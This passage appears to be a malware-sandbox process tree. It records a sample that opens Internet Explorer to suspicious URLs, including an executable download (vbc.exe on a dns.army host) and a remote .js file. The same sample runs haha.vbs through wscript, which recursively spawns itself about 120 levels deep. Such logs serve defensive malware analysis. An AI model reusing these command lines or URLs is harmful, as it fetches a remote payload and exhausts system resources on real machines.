- Suspicious use of SetWindowsHookEx
PID:1208
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://smoggy-inexpensive-innocent.glitch.me/4⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1736 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1736 CREDAT:275457 /prefetch:25⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2864
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://mail.yahoo.com/4⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2904 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2904 CREDAT:275457 /prefetch:25⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2260
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://languishcharmingwidely.com/22/f4/31/22f431404146fb2f892b30f7d213aea4.js4⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3016 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3016 CREDAT:275457 /prefetch:25⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2456
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.msnsndstdyyemkemafgk.dns.army/receipst/vbc.exe?pla4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2376 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2376 CREDAT:275457 /prefetch:25⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:204
-
-
-
C:\Windows\system32\calc.execalc4⤵PID:2572
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.youtube.com/4⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2344 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2344 CREDAT:275457 /prefetch:25⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2960
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://smoggy-inexpensive-innocent.glitch.me/4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2264 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2264 CREDAT:275457 /prefetch:25⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:200
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://mail.yahoo.com/4⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2328 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2328 CREDAT:275457 /prefetch:25⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1556
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://languishcharmingwidely.com/22/f4/31/22f431404146fb2f892b30f7d213aea4.js4⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:808 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:808 CREDAT:275457 /prefetch:25⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3360
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.msnsndstdyyemkemafgk.dns.army/receipst/vbc.exe?pla4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2504 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2504 CREDAT:275457 /prefetch:25⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2912
-
-
-
C:\Windows\system32\calc.execalc4⤵PID:1048
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.youtube.com/4⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2476 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2476 CREDAT:275457 /prefetch:25⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3284
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://smoggy-inexpensive-innocent.glitch.me/4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1476 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1476 CREDAT:275457 /prefetch:25⤵
- System Location Discovery: System Language Discovery
PID:3380
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://mail.yahoo.com/4⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2524 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2524 CREDAT:275457 /prefetch:25⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3484
-
-
-
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs3⤵
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs4⤵PID:1160
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs5⤵PID:2340
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs6⤵PID:316
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs7⤵PID:1624
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs8⤵PID:3556
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs9⤵PID:3632
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs10⤵PID:3700
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs11⤵PID:3752
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs12⤵PID:3792
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs13⤵PID:3840
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs14⤵PID:3952
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs15⤵PID:3536
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs16⤵PID:4012
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs17⤵PID:4540
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs18⤵PID:4656
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs19⤵PID:4756
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs20⤵PID:4840
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs21⤵PID:4176
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs22⤵PID:4368
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs23⤵PID:5056
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs24⤵PID:3912
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs25⤵PID:4332
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs26⤵PID:1432
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs27⤵PID:4312
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs28⤵PID:4392
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs29⤵PID:5152
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs30⤵PID:5208
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs31⤵PID:5292
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs32⤵PID:5356
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs33⤵PID:5404
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs34⤵PID:5448
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs35⤵PID:5484
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs36⤵PID:5540
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs37⤵PID:5584
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs38⤵PID:5640
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs39⤵PID:5688
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs40⤵PID:5728
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs41⤵PID:5772
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs42⤵PID:5836
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs43⤵PID:5884
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs44⤵PID:6080
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs45⤵PID:6112
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs46⤵PID:5144
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs47⤵PID:5412
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs48⤵PID:344
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs49⤵PID:5876
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs50⤵PID:5972
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs51⤵PID:6012
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs52⤵PID:5924
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs53⤵PID:5936
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs54⤵PID:6152
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs55⤵PID:6196
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs56⤵PID:6248
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs57⤵PID:6292
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs58⤵PID:6328
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs59⤵PID:6368
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs60⤵PID:6408
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs61⤵PID:6444
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs62⤵PID:6536
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs63⤵PID:6584
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs64⤵PID:6620
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs65⤵PID:6728
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs66⤵PID:6796
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs67⤵PID:6880
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs68⤵PID:7064
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs69⤵PID:3608
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs70⤵PID:6544
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs71⤵PID:6836
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs72⤵PID:7004
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs73⤵PID:7096
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs74⤵PID:6572
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs75⤵PID:6820
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs76⤵PID:7000
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs77⤵PID:6224
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs78⤵PID:6772
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs79⤵PID:6968
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs80⤵PID:6908
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs81⤵PID:7024
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs82⤵PID:6872
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs83⤵PID:7008
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs84⤵PID:6472
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs85⤵PID:7176
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs86⤵PID:7284
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs87⤵PID:7332
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs88⤵PID:7424
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs89⤵PID:7544
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs90⤵PID:7624
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs91⤵PID:7684
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs92⤵PID:7772
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs93⤵PID:7856
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs94⤵PID:7928
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs95⤵PID:8012
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs96⤵PID:8056
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs97⤵PID:8104
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs98⤵PID:8140
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs99⤵PID:7188
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs100⤵PID:7260
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs101⤵PID:7376
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs102⤵PID:7440
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs103⤵PID:7508
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs104⤵PID:7576
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs105⤵PID:7356
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs106⤵PID:7756
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs107⤵PID:7840
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs108⤵PID:7920
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs109⤵PID:8000
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs110⤵PID:7896
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs111⤵PID:7472
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs112⤵PID:8160
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs113⤵PID:7484
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs114⤵PID:7340
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs115⤵PID:8200
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs116⤵PID:8236
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs117⤵PID:8280
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs118⤵PID:8316
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs119⤵PID:8352
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs120⤵PID:8392
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs121⤵PID:8432
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs122⤵PID:8468
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-